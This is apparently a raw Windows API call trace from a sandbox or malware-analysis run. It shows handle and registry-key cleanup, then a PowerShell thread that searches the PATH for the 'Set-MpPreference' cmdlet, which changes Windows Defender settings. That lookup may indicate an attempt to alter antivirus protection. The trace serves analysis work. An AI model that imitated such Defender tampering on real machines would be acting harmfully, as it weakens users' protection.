	[0062.153] GetLastError () returned 0x0
	[0062.153] RegCloseKey (hKey=0x304) returned 0x0
	[0062.153] RegCloseKey (hKey=0x300) returned 0x0
	[0062.153] RegCloseKey (hKey=0x2fc) returned 0x0
	[0062.153] LocalFree (hMem=0x264018) returned 0x0
	[0062.154] GetLastError () returned 0x0
	[0062.154] RegCloseKey (hKey=0x32c) returned 0x0
	[0063.062] RegCloseKey (hKey=0x3ac) returned 0x0
	[0063.062] RegCloseKey (hKey=0x374) returned 0x0
	[0063.062] RegCloseKey (hKey=0x370) returned 0x0
	[0063.063] RegCloseKey (hKey=0x36c) returned 0x0
	[0063.063] RegCloseKey (hKey=0x368) returned 0x0
	[0063.063] RegCloseKey (hKey=0x364) returned 0x0
	[0063.063] RegCloseKey (hKey=0x360) returned 0x0
	[0063.063] RegCloseKey (hKey=0x35c) returned 0x0
	[0063.063] RegCloseKey (hKey=0x358) returned 0x0
	[0063.064] RegCloseKey (hKey=0x3a8) returned 0x0
	[0063.064] RegCloseKey (hKey=0x348) returned 0x0
	[0063.064] RegCloseKey (hKey=0x344) returned 0x0
	[0063.064] RegCloseKey (hKey=0x340) returned 0x0
	[0063.064] RegCloseKey (hKey=0x33c) returned 0x0
	[0063.064] RegCloseKey (hKey=0x338) returned 0x0
	[0063.065] RegCloseKey (hKey=0x334) returned 0x0
	[0063.065] RegCloseKey (hKey=0x330) returned 0x0
	[0063.065] RegCloseKey (hKey=0x320) returned 0x0
	[0063.065] RegCloseKey (hKey=0x3a4) returned 0x0
	[0063.065] RegCloseKey (hKey=0x300) returned 0x0
	[0063.065] RegCloseKey (hKey=0x2fc) returned 0x0
	[0063.065] RegCloseKey (hKey=0x3a0) returned 0x0
	[0063.066] RegCloseKey (hKey=0x39c) returned 0x0
	[0063.066] RegCloseKey (hKey=0x378) returned 0x0
	[0063.066] RegCloseKey (hKey=0x3b4) returned 0x0
	[0063.066] RegCloseKey (hKey=0x394) returned 0x0
	[0063.066] RegCloseKey (hKey=0x390) returned 0x0
	[0063.067] RegCloseKey (hKey=0x38c) returned 0x0
	[0063.067] RegCloseKey (hKey=0x388) returned 0x0
	[0063.067] RegCloseKey (hKey=0x384) returned 0x0
	[0063.067] RegCloseKey (hKey=0x380) returned 0x0
	[0063.067] RegCloseKey (hKey=0x37c) returned 0x0
	[0063.067] RegCloseKey (hKey=0x354) returned 0x0
	[0063.067] RegCloseKey (hKey=0x3b0) returned 0x0
	[0063.068] RegCloseKey (hKey=0x32c) returned 0x0
	[0064.888] GetLastError () returned 0x0
	[0064.888] GetLastError () returned 0x0
	[0064.888] LocalFree (hMem=0x24e460) returned 0x0
	[0064.888] GetLastError () returned 0x0
	[0064.888] GetLastError () returned 0x0
	[0064.888] GetLastError () returned 0x0
	[0064.888] LocalFree (hMem=0x24e3d8) returned 0x0
	[0064.888] GetLastError () returned 0x0
	[0064.898] DeregisterEventSource (hEventLog=0x4350004) returned 1
	[0064.900] GetLastError () returned 0x0
	[0064.913] CloseHandle (hObject=0x3bc) returned 1
	[0064.913] GetLastError () returned 0x0
	[0064.913] CloseHandle (hObject=0x398) returned 1
	[0064.913] GetLastError () returned 0x0
	[0064.914] CloseHandle (hObject=0x3ac) returned 1
	[0064.914] GetLastError () returned 0x0
	[0064.914] CloseHandle (hObject=0x374) returned 1
	[0064.914] GetLastError () returned 0x0
	[0064.914] CloseHandle (hObject=0x370) returned 1
	[0064.914] GetLastError () returned 0x0
	[0064.914] CloseHandle (hObject=0x36c) returned 1
	[0064.914] GetLastError () returned 0x0
	[0064.915] CloseHandle (hObject=0x368) returned 1
	[0064.915] GetLastError () returned 0x0
	[0064.915] CloseHandle (hObject=0x364) returned 1
	[0064.915] GetLastError () returned 0x0
	[0064.915] CloseHandle (hObject=0x360) returned 1
	[0064.915] GetLastError () returned 0x0
	[0064.915] CloseHandle (hObject=0xf) returned 1
	[0064.915] GetLastError () returned 0x0
	[0064.916] CloseHandle (hObject=0x7f) returned 1
	[0064.916] GetLastError () returned 0x0
	[0064.916] CloseHandle (hObject=0x7b) returned 1
	[0064.916] GetLastError () returned 0x0
	[0064.916] CloseHandle (hObject=0x77) returned 1
	[0064.917] GetLastError () returned 0x0
	[0064.917] CloseHandle (hObject=0x73) returned 1
	[0064.917] GetLastError () returned 0x0
	[0064.917] CloseHandle (hObject=0x6f) returned 1
	[0064.917] GetLastError () returned 0x0
	[0064.917] CloseHandle (hObject=0x6b) returned 1
	[0064.918] GetLastError () returned 0x0
	[0064.918] CloseHandle (hObject=0x67) returned 1
	[0064.918] GetLastError () returned 0x0
	[0064.918] CloseHandle (hObject=0x63) returned 1
	[0064.918] GetLastError () returned 0x0
	[0064.918] CloseHandle (hObject=0x5f) returned 1
	[0064.919] GetLastError () returned 0x0
	[0064.919] CloseHandle (hObject=0x5b) returned 1
	[0064.919] GetLastError () returned 0x0
	[0064.919] CloseHandle (hObject=0x57) returned 1
	[0064.919] GetLastError () returned 0x0
	[0064.919] CloseHandle (hObject=0x53) returned 1
	[0064.920] GetLastError () returned 0x0
	[0064.920] CloseHandle (hObject=0x4f) returned 1
	[0064.920] GetLastError () returned 0x0
	[0064.920] CloseHandle (hObject=0x4b) returned 1
	[0064.920] GetLastError () returned 0x0
	[0064.920] CloseHandle (hObject=0x47) returned 1
	[0064.920] GetLastError () returned 0x0
	[0064.921] CloseHandle (hObject=0x43) returned 1
	[0064.921] GetLastError () returned 0x0
	[0064.921] RegCloseKey (hKey=0x320) returned 0x0
	[0064.921] CloseHandle (hObject=0x3a4) returned 1
	[0064.921] GetLastError () returned 0x0
	[0064.921] CloseHandle (hObject=0x300) returned 1
	[0064.921] GetLastError () returned 0x0
	[0064.921] CloseHandle (hObject=0x2fc) returned 1
	[0064.921] GetLastError () returned 0x0
	[0064.922] CloseHandle (hObject=0x3a0) returned 1
	[0064.922] GetLastError () returned 0x0
	[0064.922] CloseHandle (hObject=0x39c) returned 1
	[0064.922] GetLastError () returned 0x0
	[0064.922] CloseHandle (hObject=0x378) returned 1
	[0064.922] GetLastError () returned 0x0
	[0064.922] CloseHandle (hObject=0x3b4) returned 1
	[0064.922] GetLastError () returned 0x0
	[0064.922] CloseHandle (hObject=0x394) returned 1
	[0064.922] GetLastError () returned 0x0
	[0064.922] CloseHandle (hObject=0x390) returned 1
	[0064.922] GetLastError () returned 0x0
	[0064.923] CloseHandle (hObject=0x38c) returned 1
	[0064.923] GetLastError () returned 0x0
	[0064.923] CloseHandle (hObject=0x388) returned 1
	[0064.923] GetLastError () returned 0x0
	[0064.923] CloseHandle (hObject=0x384) returned 1
	[0064.923] GetLastError () returned 0x0
	[0064.923] CloseHandle (hObject=0x380) returned 1
	[0064.923] GetLastError () returned 0x0
	[0064.923] CloseHandle (hObject=0x3f) returned 1
	[0064.923] GetLastError () returned 0x0
	[0064.924] CloseHandle (hObject=0x3b) returned 1
	[0064.924] GetLastError () returned 0x0
	[0064.924] CloseHandle (hObject=0x37) returned 1
	[0064.924] GetLastError () returned 0x0
	[0064.924] CloseHandle (hObject=0x33) returned 1
	[0064.924] GetLastError () returned 0x0
	[0064.924] CloseHandle (hObject=0x2f) returned 1
	[0064.925] GetLastError () returned 0x0
	[0064.925] CloseHandle (hObject=0x2b) returned 1
	[0064.925] GetLastError () returned 0x0
	[0064.925] CloseHandle (hObject=0x27) returned 1
	[0064.925] GetLastError () returned 0x0
	[0064.925] CloseHandle (hObject=0x23) returned 1
	[0064.926] GetLastError () returned 0x0
	[0064.926] CloseHandle (hObject=0x1f) returned 1
	[0064.926] GetLastError () returned 0x0
	[0064.926] CloseHandle (hObject=0x1b) returned 1
	[0064.926] GetLastError () returned 0x0
	[0064.926] CloseHandle (hObject=0x17) returned 1
	[0064.927] GetLastError () returned 0x0
	[0064.927] CloseHandle (hObject=0x13) returned 1
	[0064.927] GetLastError () returned 0x0
	[0064.927] CloseHandle (hObject=0x318) returned 1
	[0064.927] GetLastError () returned 0x0
	[0064.927] RegCloseKey (hKey=0x3d0) returned 0x0
	[0064.927] UnmapViewOfFile (lpBaseAddress=0x1ce0000) returned 1
	[0064.928] CloseHandle (hObject=0x328) returned 1
	[0064.928] GetLastError () returned 0x0
	[0064.928] RegCloseKey (hKey=0x80000004) returned 0x0
	[0064.929] CloseHandle (hObject=0x3cc) returned 1
	[0064.929] GetLastError () returned 0x0
	[0064.929] CloseHandle (hObject=0x2e4) returned 1
	[0064.929] GetLastError () returned 0x0
	[0064.929] CloseHandle (hObject=0x3c8) returned 1
	[0064.929] GetLastError () returned 0x0
	[0064.929] CloseHandle (hObject=0x3c4) returned 1
	[0064.929] GetLastError () returned 0x0
	[0064.929] CloseHandle (hObject=0x3c0) returned 1
	[0064.929] GetLastError () returned 0x0

Thread:
	id = 69
	os_tid = 0x824

	[0063.573] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0063.610] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0063.616] VirtualQuery (in: lpAddress=0x570e370, lpBuffer=0x570f370, dwLength=0x1c | out: lpBuffer=0x570f370*(BaseAddress=0x570e000, AllocationBase=0x4d80000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.618] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.618] GetLastError () returned 0xcb
	[0063.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.621] GetLastError () returned 0xcb
	[0063.622] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.622] GetLastError () returned 0xcb
	[0063.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.633] GetLastError () returned 0xcb
	[0063.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.635] GetLastError () returned 0xcb
	[0063.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.635] GetLastError () returned 0xcb
	[0063.643] VirtualQuery (in: lpAddress=0x570e48c, lpBuffer=0x570f48c, dwLength=0x1c | out: lpBuffer=0x570f48c*(BaseAddress=0x570e000, AllocationBase=0x4d80000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0063.644] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.644] GetLastError () returned 0xcb
	[0063.646] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.646] GetLastError () returned 0xcb
	[0063.646] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.646] GetLastError () returned 0xcb
	[0063.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.654] GetLastError () returned 0xcb
	[0063.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.692] GetLastError () returned 0xcb
	[0063.716] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.716] GetLastError () returned 0xcb
	[0063.718] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.718] GetLastError () returned 0xcb
	[0063.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.719] GetLastError () returned 0xcb
	[0063.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.720] GetLastError () returned 0xcb
	[0063.721] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.721] GetLastError () returned 0xcb
	[0063.721] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.722] GetLastError () returned 0xcb
	[0063.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.723] GetLastError () returned 0xcb
	[0063.743] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b12c8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0063.743] GetLastError () returned 0xcb
	[0063.785] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2b1320, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0063.785] GetLastError () returned 0xcb
	[0063.789] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2b1320, nSize=0x80 | out: lpBuffer="") returned 0x88
	[0063.789] GetLastError () returned 0xcb
	[0063.789] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2b1320, nSize=0x88 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0063.789] GetLastError () returned 0xcb
	[0063.798] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2b14c0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0063.798] GetLastError () returned 0xcb
	[0063.805] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0063.805] GetLastError () returned 0xcb
	[0063.806] SetErrorMode (uMode=0x1) returned 0x1
	[0063.807] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.ps1", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.808] GetLastError () returned 0x2
	[0063.808] SetErrorMode (uMode=0x1) returned 0x1
	[0063.809] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0063.809] GetLastError () returned 0x2
	[0063.809] SetErrorMode (uMode=0x1) returned 0x1
	[0063.810] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.psm1", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.810] GetLastError () returned 0x2
	[0063.810] SetErrorMode (uMode=0x1) returned 0x1
	[0063.810] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0063.810] GetLastError () returned 0x2
	[0063.810] SetErrorMode (uMode=0x1) returned 0x1
	[0063.810] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.psd1", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.810] GetLastError () returned 0x2
	[0063.810] SetErrorMode (uMode=0x1) returned 0x1
	[0063.810] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0063.810] GetLastError () returned 0x2
	[0063.810] SetErrorMode (uMode=0x1) returned 0x1
	[0063.810] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.COM", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.811] GetLastError () returned 0x2
	[0063.811] SetErrorMode (uMode=0x1) returned 0x1
	[0063.811] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0063.811] GetLastError () returned 0x2
	[0063.811] SetErrorMode (uMode=0x1) returned 0x1
	[0063.811] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.EXE", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.811] GetLastError () returned 0x2
	[0063.811] SetErrorMode (uMode=0x1) returned 0x1
	[0063.811] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0063.811] GetLastError () returned 0x2
	[0063.811] SetErrorMode (uMode=0x1) returned 0x1
	[0063.811] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.BAT", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.811] GetLastError () returned 0x2
	[0063.811] SetErrorMode (uMode=0x1) returned 0x1
	[0063.812] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0063.812] GetLastError () returned 0x2
	[0063.812] SetErrorMode (uMode=0x1) returned 0x1
	[0063.812] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.CMD", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.812] GetLastError () returned 0x2
	[0063.812] SetErrorMode (uMode=0x1) returned 0x1
	[0063.812] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0063.812] GetLastError () returned 0x2
	[0063.812] SetErrorMode (uMode=0x1) returned 0x1
	[0063.812] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.VBS", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.812] GetLastError () returned 0x2
	[0063.812] SetErrorMode (uMode=0x1) returned 0x1
	[0063.812] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0063.812] GetLastError () returned 0x2
	[0063.812] SetErrorMode (uMode=0x1) returned 0x1
	[0063.813] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.VBE", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.813] GetLastError () returned 0x2
	[0063.813] SetErrorMode (uMode=0x1) returned 0x1
	[0063.813] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0063.813] GetLastError () returned 0x2
	[0063.813] SetErrorMode (uMode=0x1) returned 0x1
	[0063.813] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.JS", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.813] GetLastError () returned 0x2
	[0063.813] SetErrorMode (uMode=0x1) returned 0x1
	[0063.813] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0063.813] GetLastError () returned 0x2
	[0063.813] SetErrorMode (uMode=0x1) returned 0x1
	[0063.813] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.JSE", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.814] GetLastError () returned 0x2
	[0063.814] SetErrorMode (uMode=0x1) returned 0x1
	[0063.814] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0063.814] GetLastError () returned 0x2
	[0063.814] SetErrorMode (uMode=0x1) returned 0x1
	[0063.814] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.WSF", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.814] GetLastError () returned 0x2
	[0063.814] SetErrorMode (uMode=0x1) returned 0x1
	[0063.814] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0063.814] GetLastError () returned 0x2
	[0063.814] SetErrorMode (uMode=0x1) returned 0x1
	[0063.814] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.WSH", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.814] GetLastError () returned 0x2
	[0063.814] SetErrorMode (uMode=0x1) returned 0x1
	[0063.814] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x570ead0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0063.815] GetLastError () returned 0x2
	[0063.815] SetErrorMode (uMode=0x1) returned 0x1
	[0063.815] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.MSC", lpFindFileData=0x2b14c0 | out: lpFindFileData=0x2b14c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0063.815] GetLastError () returned 0x2
